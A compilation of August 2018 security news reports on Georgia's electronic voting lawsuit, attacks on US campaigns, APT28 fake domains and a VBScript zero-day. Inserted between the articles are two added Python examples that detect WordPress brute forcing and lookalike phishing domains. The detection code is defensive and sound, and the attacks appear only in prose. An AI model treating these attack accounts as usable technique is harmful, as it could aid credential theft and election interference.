The security of electronic voting and the direct-recording election (DRE) voting machines used has been questioned for years. The upcoming U.S. midterm elections in November, coupled with the attempted Russian meddling in the 2016 presidential election, have made this a current and major concern for many in the security industry and beyond. Now it has gone to court.

Earlier this month (Aug. 3), the Coalition for Good Governance filed a Motion for Preliminary Injunction against the Secretary of State for Georgia (Brian Kemp, who is also the Republican candidate for governor in the midterms) seeking to force the state to abandon DREs and revert to a paper ballot.

The Secretary of State has responded to the Motion, claiming, “Such recklessness, if given the power of a federal decree, would compromise the public interest.”

Security concerns

Concern over the security of electronic voting was heightened following the 2016 presidential election. The incumbent Obama administration accused Russia of interfering and being behind a breach of the DNC and subsequent leak of sensitive data.

For the most part it is believed that Russia attempted to influence rather than control the vote. However, an NSA document acquired and discussed by The Intercept in June 2017 “raises the possibility that Russian hacking may have breached at least some elements of the voting system, with disconcertingly uncertain results.”

There is no claim that Russia affected the outcome of the election. The primary concern is that nobody knows the extent of what was done, nor what could have been done – and, more disconcertingly, what might be done next time.

The vulnerability of the DRE systems themselves is hardly doubted. At the end of 2016, both Cylance and Symantec separately demonstrated hacks against DREs. This month DEF CON ran its second annual Vote Hacking Village, where attendees were invited to hack the voting infrastructure, including DREs – and numerous vulnerabilities were found and exploited.

DRE manufacturers, and officials using them, are quick to point out most exploits require physical access to the machines, and that any individual hack would only affect the votes made on that system. The overall vote itself will remain statistically valid.

Last week (Aug. 13), a new survey from Venafi found that 93% of more than 400 IT security professionals from the U.S., UK and Australia “are concerned about cyber-attacks targeting election infrastructure and data.” Furthermore, “81% believe cyber criminals will target election data as it is transmitted between machines, software and hardware applications, and moved from local polling stations to central aggregation points.”

The voting infrastructure is much wider than vulnerable DREs alone.

Court case in Georgia

The Coalition for Good Governance is attempting to gain a court order to force Georgia to abandon electronic voting and go back to a paper-based ballot because it does not believe a full and fair vote can be guaranteed. It has asked for a Preliminary Injunction.

Georgia stands out from the majority of states. Although not one of the perennial swing states, these midterms are likely to be different, and relatively few votes could swing the result one way or the other.

Georgia uses approximately 27,000 Diebold AccuVote DRE touchscreen voting units running a modified version of Windows CE. These units do not and cannot produce a paper audit trail of votes. Georgia is one of just a few states – and the largest – that does not produce a paper backup.

The Coalition’s argument hinges on three elements: that DREs are inherently insecure; that Georgia’s voting system has already been breached; and that Georgia voting officials destroyed all evidence of who might have benefited from the breach.

The breach was discovered by security researcher Logan Lamb. The court document states, “In late August 2016, cybersecurity researcher Logan Lamb accessed files hosted on the elections.kennesaw.edu server on the public internet, including the voter histories and personal information of all Georgia voters, tabulation and memory card programming databases for past and future elections, instructions and passwords for voting equipment administration, and executable programs controlling essential election resources.”

This database, including registration details for 6.7 million Georgia voters, was unprotected and could be accessed by anybody with an internet connection.

Richard DeMillo, director of Georgia Tech's Center for 21st Century Universities, told SecurityWeek, “If I were a hacker trying to affect an election in this state, that's where I would start. Because once you have access to those databases, you can, for example, on election day send people to the wrong polling stations. I actually think that this is a line of attack that people haven't looked at which has to do with simply changing contact information for voters.”

DeMillo is a professor at Georgia Tech, has worked in cybersecurity for more than 40 years, and, he says, is “a longtime observer of election security in the state of Georgia.” He is not an official advisor to the Coalition, but as an employee of a public university is available to offer advice to anyone who seeks it.

The concern for the Coalition is that firstly, Georgia did little to secure the database – it remained online and available to everyone for at least six months before it was removed; secondly, that Georgia did not undertake a forensic examination to determine whether the database had been altered or manipulated; and thirdly, three days after the Coalition’s lawsuit was filed, election officials “destroyed all data on the hard drives of the KSU elections.kennesaw.edu server.”

There is consequently now no way of knowing who may have accessed that database nor whether any unauthorized changes were made to it.

Marilyn R. Marks, VP and executive director of the Coalition for Good Governance, described another potential attack against the Georgia midterms that would be relatively easy if the pollbooks stored at KSU had been downloaded or amended by attackers.

“One of [Demillo’s] colleagues went to vote, and he was issued the wrong ballot (his affidavit is in the Exhibits of the Motion),” Marks told SecurityWeek. “Name is Kadel. He was given the wrong electronic ballot. If you look at his voter registration record, name address, everything's just fine. We do not know what happened.” His ballot paper seemed to be in order, but was for Congressional District 5 instead of Congressional District 6. Had he not noticed this discrepancy his vote would have been nullified.

“But here's another theoretical attack,” continued Marks. “You can leave all that stuff there. But change the ballot combination code that's in the electronic pollbook and the voter gets issued the wrong ballot. Nobody knows what their ballot combination is. It's not given out to voters.”

Rob Kadel is assistant director for research in education innovation, Center for 21st Century Universities at Georgia Tech.

The Secretary of State’s response to the Coalition’s motion is to concentrate on the physical problems of changing to paper at this stage. The response does not attempt to prove that DRE machines are secure, but states that the Coalition has not proven them to be insecure. It describes the motion as ‘Plaintiff’s paranoia’, and says, “Luddite prejudices against software technology are insufficient justification to override a statutory regime promulgated by duly-elected legislators, sustained against prior constitutional challenges, and overseen by state officials acting pursuant to their respective duties within that legislative framework.”

Both sides vehemently disagree. The Coalition was set to file its own reply to Kemp’s response on Monday (SecurityWeek will post the URLs to this and to Secretary Kemp’s initial response as soon as they become available). The reply is likely to assert that a switch to paper is feasible within the time constraints.

Industry views on the midterms in Georgia

The outcome of the Motion for Preliminary Injunction will be decided by the court, and probably very quickly. In the meantime, SecurityWeek talked to several security experts for their view on the current situation.

“The key to any voting system is the integrity of the data, and given the proven attacks against the DRE systems, this can no longer be guaranteed,” commented Joseph Kucic, CSO at Cavirin. “Without evidence of having the appropriate controls there is a good chance that the plaintiffs could win their case. With regard to the actual motion, any difficulties with paper ballot deployment – and there should not be many – are more than made up for by the potential risks of a compromised system.”

Not everyone agrees. Sanjay Kalra, co-founder and chief product officer at Lacework, told SecurityWeek, “Moving backwards to paper-based systems is not only inefficient, it’s also not materially any more secure. Hackers want to disrupt and steal, which they will do aggressively, irrespective of medium or platform. For those running digital election systems, the vision should be to use a best practices approach along with tools that support awareness and remediation to provide the best protection against bad actors. Those responsible for data protection must always seek to balance efficiency, user experience and security.”

“There’s a compelling case to be made on both sides,” says Abhishek Iyer, technical marketing manager at Demisto. Reverting to paper is supported by the general lack of confidence in the security of DREs and the known voter data leaks. “However,” he adds, “with impending midterm elections, there’s not enough time to execute an end-to-end change and go back to paper-based voting; improper transition could result in voter confusion, error, and inadvertent suppression (since electronic systems are also used to verify voter registration).”

Marilyn Marks disagrees. “There’s no new voting system needed, and no new equipment,” she told SecurityWeek. “They already use paper ballots (for example, for postal votes). They just need to dispense with the touchscreen machines, put paper votes into ballot boxes to be transported to the election office and use the scanners they already have to scan the votes in quantity. All that is needed is more of the same paper ballots – and the printers still have many weeks to do that.”

Ryan Jones, managing principal at Coalfire Labs, didn’t want to comment on any legal aspects between the Coalition for Good Governance and the secretary of state for Georgia. But he did say, “We have assessed not only voting machines, but also the Voluntary Voting System Guidelines standard – by which most voting machines are gauged – as well as the end-to-end gaps in pre-election, election, and post-election processes. We can say with some assurance,” he confirmed, “that machines in their current state, despite having met the VVSG standard, have many technical aspects that can be compromised by a diligent hacker that looks at the hacking challenge across the entire system and process. We have compromised multiple voting systems in a lab setting in as little as two minutes; and as news reports attest, an 11-year-old also recently hacked a voting environment at a security conference.” [DEF CON’s Vote Hacking Village.]

Last word goes to Professor Rich Demillo. “Georgia is the largest state that does not use auditable elections equipment; so, if I were in the attackers' shoes and was looking for a return on investment, this is the kind of state that I would look at -- a state where the races are likely to be tight and where the chance of me being discovered is going to be slim because by design it is impossible to verify after the election that there was a breach.”

It is now up to the court to decide whether well-documented flaws in the existing electronic voting infrastructure combined with the lack of any auditing capability are sufficiently serious to force a last-minute switch back to paper-based voting in the Georgia state midterm elections in November.

FBI Probes Computer Hacks in California House Campaigns
22.8.2018 securityweek BigBrothers

HUNTINGTON BEACH, Calif. (AP) — The FBI launched investigations after two Southern California Democratic U.S. House candidates were targeted by computer hackers, though it's unclear whether politics had anything to do with the attacks.

A law enforcement official told The Associated Press the FBI looked into hacks involving David Min in the 45th Congressional District and Hans Keirstead in the adjacent 48th District. Both districts are in Orange County and are seen as potential pickups as the Democratic Party seeks to win control of the Congress in November.

A person with knowledge of the Min investigation told the AP on Monday that two laptops used by senior staffers for the candidate were found infected with malware in March. It's not clear what, if any, data was stolen, and there is no evidence the breach influenced the contest.

The CEO of a biomedical research company, Keirstead last summer was the victim of a broad "spear-phishing" attack, in which emails that appear to come from a friend or familiar source are designed to help hackers snatch sensitive or confidential information, the law enforcement official said. There is no evidence Keirstead lost valuable information.

The investigations so far have not turned up evidence the two candidates in Orange County were political targets.

The official and the knowledgeable person were not authorized to discuss the cases publicly and spoke only on condition of anonymity.

Keirstead was narrowly defeated in the June primary for the seat held by Republican Rep. Dana Rohrabacher. Min came in third in the contest to unseat Republican Rep. Mimi Walters.

Min's staff was alerted to a potential cyberattack by a facility manager in the software incubator where his campaign rented space. It was later found the computers were infected with software that records and sends keystrokes, with additional software that concealed it from conventional anti-virus tools used by the campaign.

Hackers also used a broad spear-phishing attack in an attempt to gain access, and FBI investigators are still piecing together additional details, the official said.

The two laptops were replaced, and Min's computer was not infected. The attack on the computers was first reported by Reuters.

Keirstead campaign officials detected repeated attempts to access the campaign's website.

Rolling Stone magazine, which first reported that cyberattack, said hackers or bots tried different username-password combinations in a rapid-fire sequence over a two-and-a-half-month period to get inside the campaign's WordPress-hosted website.

According to the campaign, there were also more than 130,000 so-called brute force attempts over a monthlong period to gain access to the campaign's server through the cloud-server company that hosted the Keirstead campaign's website, Rolling Stone said.

Computer security experts say that large numbers of attempts to gain access to a site hosted with the popular and free WordPress software are not unusual.

"Every WordPress hosted website sees 130,000 brute force attempts over a monthlong period, regardless whether it's Bohemian basket weaving, a blog about furry costume construction, or a politician website," said Robert Graham, a cybersecurity expert who created the BlackICE personal firewall.

"Hackers don't know or care who you are: they only care that you use WordPress," Graham said in a text message.
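The 130,000 login attempts described above are the background noise every WordPress host sees, but a campaign still has to tell a routine bot sweep from a burst that ends in a successful login. Below is an added example, not code from the article, the campaigns or the experts quoted in it, that reads web-server access log lines in the common "combined" format, counts failed POSTs to the WordPress login endpoints per source address inside a sliding time window, and flags any address that crosses the threshold and then receives a login redirect. The log lines are constructed for the example, and the threshold and window are assumptions to tune per site.

```python
"""Flag WordPress login brute forcing in combined-format access logs.

Added example, not code from the article or anyone quoted in it. The log
lines in SAMPLE_LOG are constructed; the thresholds are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/Nginx "combined" format: ip ident user [time] "request" status bytes ...
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Endpoints hit by credential-stuffing bots: the login form itself and
# XML-RPC, whose system.multicall lets one request test many passwords.
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")


def parse_line(line):
    """Return a dict for a parsable line, None otherwise."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],  # drop ?redirect_to=... etc.
        "status": int(m["status"]),
    }


def detect_bruteforce(lines, threshold=5, window=timedelta(minutes=10)):
    """Map flagged source IP -> {"failures": peak_in_window, "success_after_failures": bool}.

    A failed wp-login.php POST returns 200 (the form is re-rendered with
    an error); a successful one returns 302 to wp-admin. A 302 from an
    address that has just crossed the failure threshold is the event to
    escalate: the account may have been guessed.
    """
    attempts = defaultdict(list)  # ip -> [(timestamp, status)]
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] in LOGIN_PATHS:
            attempts[rec["ip"]].append((rec["ts"], rec["status"]))

    findings = {}
    for ip, events in attempts.items():
        events.sort()
        fail_ts = [ts for ts, status in events if status == 200]
        peak, start, crossed_at = 0, 0, None
        for end, ts in enumerate(fail_ts):  # sliding window over failures only
            while ts - fail_ts[start] > window:
                start += 1
            count = end - start + 1
            peak = max(peak, count)
            if count >= threshold and crossed_at is None:
                crossed_at = ts
        if crossed_at is None:
            continue
        success_after = any(status == 302 and ts > crossed_at for ts, status in events)
        findings[ip] = {"failures": peak, "success_after_failures": success_after}
    return findings


def _line(ip, ts, request, status):
    """Build one constructed combined-format log line."""
    return f'{ip} - - [{ts}] "{request}" {status} 2741 "-" "Mozilla/5.0"'


# Constructed sample: a normal login, a six-attempt burst that ends in a 302,
# two slow XML-RPC failures an hour apart, and one unparsable line.
SAMPLE_LOG = [
    _line("198.51.100.22", "22/Aug/2018:09:58:10 +0000", "GET /wp-login.php HTTP/1.1", 200),
    _line("198.51.100.22", "22/Aug/2018:09:58:31 +0000", "POST /wp-login.php HTTP/1.1", 302),
    *[_line("203.0.113.7", f"22/Aug/2018:10:00:{s:02d} +0000",
            "POST /wp-login.php?redirect_to=%2Fwp-admin%2F HTTP/1.1", 200)
      for s in range(0, 60, 10)],
    _line("203.0.113.7", "22/Aug/2018:10:01:05 +0000", "POST /wp-login.php HTTP/1.1", 302),
    _line("192.0.2.5", "22/Aug/2018:10:30:00 +0000", "POST /xmlrpc.php HTTP/1.1", 200),
    _line("192.0.2.5", "22/Aug/2018:11:30:00 +0000", "POST /xmlrpc.php HTTP/1.1", 200),
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, info)
```

Run against real logs by feeding the file object in place of SAMPLE_LOG. The window is counted over failures only, so a slow, patient sweep of a few guesses per hour stays below the threshold; raise the window or lower the threshold to catch it, at the cost of more noise from the kind of indiscriminate scanning Graham describes.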

Min finished third behind fellow Democrat Katie Porter, who faces Walters in November. In the 48th District, Rohrabacher will face Democrat Harley Rouda, who snagged the second runoff spot by defeating Keirstead by 125 votes.

Russian Hackers Went After Conservative US Groups: Microsoft
22.8.2018 securityweek BigBrothers

The Russian hacking unit that tried to interfere in the US presidential election has been targeting conservative US think tanks, Microsoft said.

Acting on a court order, the company last week seized control of six fake websites involved in such efforts, which also involved a site that mimicked the US Senate, Microsoft president Brad Smith said in a blog post Monday.

The hackers were linked to the Russian military intelligence agency known as the GRU, Smith wrote.

The idea was to have people think they were accessing links managed by these US political groups but redirect them to fake ones run by the hackers so passwords and other information could be stolen.

Smith said one such site appeared to mimic that of the International Republican Institute, which promotes democratic principles and whose board includes Republican senators, among them John McCain, who have been critical of President Vladimir Putin.

Another is similar to the domain used by the Hudson Institute, which hosts prominent discussions on topics including cybersecurity.

"We're concerned that these and other attempts pose security threats to a broadening array of groups connected with both American political parties in the run-up to the 2018 elections," Smith wrote.

Experts said the aim was to go after anyone who opposes Putin.

"This is another demonstration of the fact that the Russians aren't really pursuing partisan attacks. They are pursuing attacks that they perceive in their own national self-interest," Eric Rosenbach, the director of the Defending Digital Democracy project at Harvard University, told the New York Times.

"It's about disrupting and diminishing any group that challenges how Putin's Russia is operating at home and around the world," Rosenbach added.

The Kremlin dismissed the fresh allegations, with spokesman Dmitry Peskov saying he did not know "which hackers are being talked about, what influencing of elections".

"We do not understand what Russian military intelligence has to do with this. What is the basis of such serious accusations? They should not be raised without some foundation," he told journalists.

Microsoft's Anti-Hacking Efforts Make it an Internet Cop
21.8.2018 securityweek BigBrothers

Intentionally or not, Microsoft has emerged as a kind of internet cop by devoting considerable resources to thwarting Russian hackers.

The company's announcement Tuesday that it had identified and forced the removal of fake internet domains mimicking conservative U.S. political institutions triggered alarm on Capitol Hill and led Russian officials to accuse the company of participating in an anti-Russian "witch hunt."

Microsoft stands virtually alone among tech companies with an aggressive approach that uses U.S. courts to fight computer fraud and seize hacked websites back. In the process, it has acted more like a government detective than a global software giant.

In the case this week, the company did not just accidentally stumble onto a couple of harmless spoof websites. It seized the latest beachhead in an ongoing struggle against Russian hackers who meddled in the 2016 presidential election and a broader, decade-long legal fight to protect Microsoft customers from cybercrime.

"What we're seeing in the last couple of months appears to be an uptick in activity," Brad Smith, Microsoft's president and chief legal officer, said in an interview this week. Microsoft says it caught these particular sites early and that there's no evidence they were used in hacking.

The Redmond, Washington, company sued the hacking group best known as Fancy Bear in August 2016, saying it was breaking into Microsoft accounts and computer networks and stealing highly sensitive information from customers. The group, Microsoft said, would send "spear-phishing" emails that linked to realistic-looking fake websites in hopes targeted victims — including political and military figures — would click and betray their credentials.

The effort is not just a question of fighting computer fraud but of protecting trademarks and copyright, the company argues.

One email introduced as court evidence in 2016 showed a photo of a mushroom cloud and a link to an article about how Russia-U.S. tensions could trigger World War III. Clicking on the link might expose a user's computer to infection, hidden spyware or data theft.

An indictment from U.S. special counsel Robert Mueller has tied Fancy Bear to Russia's main intelligence agency, known as the GRU, and to the 2016 email hacking of both the Democratic National Committee and Democrat Hillary Clinton's presidential campaign.

Some security experts were skeptical about the publicity surrounding Microsoft's announcement, worried that it was an overblown reaction to routine surveillance of political organizations (potential cyberespionage honeypots) that never rose to the level of an actual hack.

The company also used its discovery as an opportunity to announce its new free security service to protect U.S. candidates, campaigns and political organizations ahead of the midterm elections.

But Maurice Turner, a senior technologist at the industry-backed Center for Democracy and Technology, said Microsoft is wholly justified in its approach to identifying and publicizing online dangers.

"Microsoft is really setting the standards with how public and how detailed they are with reporting out their actions," Turner said.

Companies including Microsoft, Google and Amazon are uniquely positioned to do this because their infrastructure and customers are affected. Turner said they "are defending their own hardware and their own software and to some extent defending their own customers."

Turner said he has not seen anyone in the industry as "out in front and open about" these issues as Microsoft.

Microsoft's Windows operating systems, as the industry leaders, had long been prime targets for viruses when in 2008 the company formed its Digital Crimes Unit, an international team of attorneys, investigators and data scientists. The unit became known earlier in this decade for taking down botnets: collections of compromised computers used as tools for financial crimes and for denial-of-service attacks that overwhelm their targets with junk data.

Richard Boscovich, a former federal prosecutor and a senior attorney in Microsoft's digital crimes unit, testified to the Senate in 2014 about how Microsoft used civil litigation as a tactic. Boscovich is also involved in the fight against Fancy Bear, which Microsoft calls Strontium, according to court filings.

To attack botnets, Microsoft would take its fight to courts, suing on the basis of the federal Computer Fraud and Abuse Act and other laws and asking judges for permission to sever the networks' command-and-control structures.

"Once the court grants permission and Microsoft severs the connection between a cybercriminal and an infected computer, traffic generated by infected computers is either disabled or routed to domains controlled by Microsoft," Boscovich said in 2014.

He said the process of taking over the accounts, known as "sinkholing," enabled Microsoft to collect valuable evidence and intelligence used to assist victims.

In the latest action against Fancy Bear, a court order filed Monday allowed Microsoft to seize six new domains, which the company said were either registered or used at some point after April 20.

Smith said this week the company is still investigating how the newly discovered domains might have been used.

A security firm, Trend Micro, identified some of the same fake domains earlier this year. They mimicked U.S. Senate websites, while using standard Microsoft log-in graphics that made them appear legitimate, said Mark Nunnikhoven, Trend Micro's vice president of cloud research.

Microsoft has good reason to take them down, Nunnikhoven said, because they can hurt its brand reputation. But the efforts also fit into a broader tech industry mission to make the internet safer.

"If consumers are not comfortable and don't feel safe using digital products," they will be less likely to use them, Nunnikhoven said.

Microsoft says Russian hackers continue targeting 2018 midterm elections
21.8.2018 securityaffairs BigBrothers  APT

Microsoft has spotted a new hacking campaign targeting the 2018 midterm elections; the company attributed the attacks to the Russia-linked APT28 group.

The tech giant attributed to Russia-linked APT28 a series of cyber attacks aimed at members of the United States Senate, conservative organizations and think tanks.

The Russian APT group tracked as APT28 (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, and STRONTIUM) has been active since at least 2007, operates under the Russian military intelligence agency GRU, and continues to target US politicians.
According to Microsoft, the Russian cyberspies created at least six fake websites related to the US Senate and conservative organizations in order to harvest credentials and other information from visitors.

APT28 fake domains

Three bogus domains were created to appear as legitimate sites belonging to the U.S. Senate, and a fourth, non-political website spoofed Microsoft’s online products.
The remaining two websites were designed to mimic two U.S. conservative think tanks:

The Hudson Institute — a conservative Washington think tank.
The International Republican Institute (IRI) — a nonprofit group that promotes democracy worldwide and whose board includes prominent Republican figures like Sen. John McCain.

The fake sites were created over the past several months; the hackers registered them with major web-hosting companies.

2018 midterm elections fake election websites
Microsoft did not provide further details on the attacks.
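The six domains described here, and in the SecurityWeek report above on the same takedown, all rely on one trick: a name close enough to a think tank’s, the Senate’s or Microsoft’s own to pass a glance in an email. Below is an added example, not code from Microsoft, SecurityWeek or Security Affairs, of the lookalike check a defender can run over a feed of newly registered domains or certificate-transparency entries against a watchlist of protected domains. It collapses visually confusable characters, measures edit distance on the registrable label, and catches the brand embedded in a longer name or pushed left into a subdomain. The watchlist and candidate names are constructed; the registrable-domain logic is a deliberately naive last-two-labels assumption, and production code would consult the Public Suffix List.

```python
"""Triage candidate hostnames against a watchlist of protected domains.

Added example, not Microsoft's, SecurityWeek's or Security Affairs' code.
PROTECTED and CANDIDATES are constructed for illustration.
"""

# Constructed watchlist of domains an organization wants to protect.
PROTECTED = ("example.org", "example-institute.org")

# Visually confusable sequences, multi-character ones first so that
# "rn" collapses to "m" before "1" becomes "l".
CONFUSABLES = [("rn", "m"), ("vv", "w"), ("cl", "d"),
               ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"), ("7", "t")]


def registrable(host):
    """Naive registrable domain: the last two labels.

    Assumption made for this example; real code should use the Public
    Suffix List so that names such as foo.co.uk are handled correctly.
    """
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def skeleton(label):
    """Collapse confusables and hyphens so look-alikes compare equal."""
    for seq, plain in CONFUSABLES:
        label = label.replace(seq, plain)
    return label.replace("-", "")


def levenshtein(a, b):
    """Plain edit distance (a transposition counts as two edits)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(hostname, protected=PROTECTED, max_edits=1):
    """Return (category, matched_protected_domain).

    Categories, most to least specific: legitimate, confusable (same
    skeleton), typo (edit distance <= max_edits), embedded (brand inside
    a longer registrable label), subdomain (brand left of the registrable
    domain, e.g. example.org.attacker.net), unrelated.
    """
    host = hostname.lower().rstrip(".")
    reg = registrable(host)
    if reg in protected:
        return ("legitimate", reg)
    cand_sld = reg.split(".")[0]
    sub_labels = host.split(".")[:-2]
    # Longest brand first, so "example-institute" wins over "example".
    for legit in sorted(protected, key=len, reverse=True):
        sld = legit.split(".")[0]
        if skeleton(cand_sld) == skeleton(sld):
            return ("confusable", legit)
        if levenshtein(cand_sld, sld) <= max_edits:
            return ("typo", legit)
        if sld in cand_sld:
            return ("embedded", legit)
        if any(skeleton(sld) in skeleton(lbl) for lbl in sub_labels):
            return ("subdomain", legit)
    return ("unrelated", None)


def triage(hostnames, protected=PROTECTED):
    """Keep only the hostnames that need a human look."""
    out = {}
    for h in hostnames:
        category, legit = classify(h, protected)
        if category not in ("legitimate", "unrelated"):
            out[h] = (category, legit)
    return out


# Constructed candidates, as they might arrive from a registration or CT feed.
CANDIDATES = [
    "www.example.org",                       # the real site
    "examp1e.org", "exarnple.org",           # digit and "rn" confusables
    "exampleinstitute.org",                  # hyphen dropped
    "exampl.org",                            # one-character typo
    "secure-example.org",                    # brand plus a lure word
    "example-institute.org.evil-host.net",   # brand in a subdomain
    "openstreetmap.org",                     # noise
]

if __name__ == "__main__":
    for host, verdict in triage(CANDIDATES).items():
        print(f"{host:40} {verdict}")
```

With max_edits at 1, a swapped pair of letters is not caught as a typo because plain Levenshtein counts it as two edits; raising the limit to 2 catches transpositions but starts matching unrelated short names, so short brands deserve a lower limit than long ones.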

“One appears to mimic the domain of the International Republican Institute, which promotes democratic principles and is led by a notable board of directors, including six Republican senators and a leading senatorial candidate. Another is similar to the domain used by the Hudson Institute, which hosts prominent discussions on topics including cybersecurity, among other important activities. Other domains appear to reference the U.S. Senate but are not specific to particular offices.” reads the post published by Microsoft.
“To be clear, we currently have no evidence these domains were used in any successful attacks before the DCU transferred control of them, nor do we have evidence to indicate the identity of the ultimate targets of any planned attack involving these domains.”
Microsoft’s Digital Crimes Unit shut down the fake websites with a court approval received last year and notified the targeted organizations.
At this time it is not possible to say whether the fake sites allowed the cyberspies to compromise visitors’ machines; Microsoft’s post does not mention any sinkhole investigation conducted by its experts.
Microsoft has shut down dozens of other fake websites since 2016 after obtaining authorization from the courts.
Experts believe that foreign states, especially Russia, will continue to attempt to hack into US politics; for this reason, Microsoft will continue to monitor activity targeting US political groups and politicians.
“Despite last week’s steps, we are concerned by the continued activity targeting these and other sites and directed toward elected officials, politicians, political groups and think tanks across the political spectrum in the United States. Taken together, this pattern mirrors the type of activity we saw prior to the 2016 election in the United States and the 2017 election in France.” continues Microsoft.
In July, speaking at the Aspen Security Forum, Microsoft VP Tom Burt announced that the tech company uncovered and stopped attempts to launch spear-phishing attacks on three 2018 congressional candidates.

Microsoft blamed the Russian APT28 group for the attacks.

We “discovered that the [fake domains] were being registered by an activity group that at Microsoft we call Strontium…that’s known as Fancy Bear or APT 28,” Burt explained.

“The consensus of the threat intelligence community right now is [that] we do not see the same level of activity by the Russian activity groups leading into the mid-year elections that we could see when we look back at them at that 2016 elections.”

The discovery made by Microsoft is part of Microsoft’s Defending Democracy Program, launched in April, which is focused on four priorities: protecting campaigns from hacking, protecting voting and the electoral process, increasing political advertising transparency, and defending against disinformation campaigns.

Microsoft also announced its AccountGuard initiative, which provides the following services to organizational and personal email accounts:

Threat notification across accounts. The Microsoft Threat Intelligence Center will enable Microsoft to detect and provide notification of attacks in a unified way across both organizational and personal email systems. For political campaigns and other eligible organizations, when an attack is identified, this will provide a more comprehensive view of attacks against campaign staff. When verifiable threats are detected, Microsoft will provide personal and expedited recommendations to campaigns and campaign staff to secure their systems.
Security guidance and ongoing education. Officials, campaigns and related political organizations will receive guidance to help make their networks and email systems more secure. This can include applying multi-factor authentication, installing the latest security updates and guidance for setting up systems that ensure only those people who need data and documents can access them. AccountGuard will provide updated briefings and training to address evolving cyberattack trends.
Early adopter opportunities. Microsoft will provide preview releases of new security features on a par with the services offered to our large corporate and government account customers.

North Korean Hackers Exploit Recently Patched Zero-Day
21.8.2018 securityweek  BigBrothers  

North Korean hackers are exploiting a recently patched vulnerability in Microsoft's VBScript engine in live attacks, security researchers say.

Tracked as CVE-2018-8373, the bug was identified as a memory corruption issue that would result in remote code execution in the context of the current user. The flaw resides in the manner in which the VBScript scripting engine handles objects in memory in Internet Explorer.

“[A]n attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine,” Microsoft said.

While the vulnerability affects the VBScript engine shipped with the latest versions of Windows, it does not affect Internet Explorer 11, as “VBScript in Windows 10 Redstone 3 (RS3) has been effectively disabled by default,” says Trend Micro, the security firm that discovered the flaw last month.

The security company also notes that the discovered exploit sample uses the same obfuscation technique as exploits for CVE-2018-8174, a VBScript engine remote code execution flaw that Microsoft addressed in May.

The method for exploiting CVE-2018-8373 and running shellcode is also similar to that of the CVE-2018-8174 exploits, which further suggests that the same author is behind both. The creator used a new use-after-free (UAF) vulnerability in vbscript.dll that was still unpatched in the latest VBScript engine when the sample was found, Trend Micro says.

Last week, Dustin Childs, communications manager for the ZDI, told SecurityWeek that the similarities between these flaws seem more than coincidental. He also pointed out that further exploits could emerge from the same group.

While Trend Micro did not attribute the attacks to a specific actor, Qihoo 360’s security researchers claim that the North Korean threat actor known as DarkHotel is behind both exploits.

The researchers say the domain name used by the zero-day exploit is the same they observed in May being used for CVE-2018-8174’s exploitation and that it is indeed linked to DarkHotel.

Qihoo 360, which has been tracking DarkHotel for a while, appears confident that this is the threat actor that has been exploiting CVE-2018-8373 since before it was patched.

“Based on our analysis, this vulnerability can be steadily exploited. Moreover, since it is the second VB engine exploit found in the wild this year, it is not far-fetched to expect other vulnerability findings in the VB engine in the future,” Trend Micro said.

First detailed in 2014, the DarkHotel advanced persistent threat (APT) actor was recently said to be connected to the infamous Lazarus Group. Based on the reuse of code between various malware families attributed to North Korean actors, Intezer and McAfee concluded that most of the malicious tools link back to Lazarus.

China Believes Its Cyber Capabilities Lag Behind US: Pentagon
21.8.2018 securityweek BigBrothers

China believes its cyberwarfare capabilities lag behind the United States, but it’s working on closing the gap, according to the U.S. Department of Defense (DOD).

In its annual report to Congress, the Pentagon describes the cyber capabilities and cyber operations of the People's Liberation Army (PLA), and warns that China continues to launch cyberattacks against organizations around the world, including in the United States.

The PLA sees cyberspace as one of the four critical security domains and it has taken steps to make improvements in this area, the report says.

“China believes its cyber capabilities and personnel lag behind the United States and is working to improve training and bolster domestic innovation to overcome these perceived deficiencies and advance cyberspace operations,” the Pentagon noted.

One of the steps taken by the PLA in an effort to improve its cyber capabilities is the creation of the Strategic Support Force (SSF). Believed to have been established in 2015, the SSF’s role is to centralize the military’s space, cyber and electronic warfare missions.

“The establishment of the SSF may represent the first step in developing a cyber force that creates efficiencies by combining cyber reconnaissance, attack, and defense capabilities into one organization,” the report reads. “PLA writings acknowledge the benefits of unifying leadership, centralizing cyber resource management, and combining offensive and defensive cyber capabilities in one military organization, and cite U.S. Cyber Command as accomplishing such a consolidation.”

According to the Pentagon, the Chinese military distinguishes between wartime and peacetime cyber operations. The former focuses on helping the PLA understand enemy trends, plan combat operations, and “ensure victory on the battlefield.” During peacetime, the focus is on defending cyberspace and electromagnetic space.

“[PLA writings] suggest that China is prepared to use cyber operations to manage the escalation of a conflict, as they view cyber operations as a low-cost deterrent and can demonstrate capabilities and resolve to an adversary,” the DoD says.

The Chinese military’s cyber warfare strategy involves targeting an adversary’s command and control (C&C) and logistics networks in an effort to disrupt its ability to operate. The PLA notes that attacking C&C systems has the potential to paralyze the enemy and gain superiority on the battlefield.

“Accordingly, the PLA may seek to use its cyberwarfare capabilities to collect data for intelligence and cyber attack purposes; to constrain an adversary’s actions by targeting network-based logistics, communications, and commercial activities; or to serve as a force- multiplier when coupled with kinetic attacks during times of crisis or conflict,” the report says.

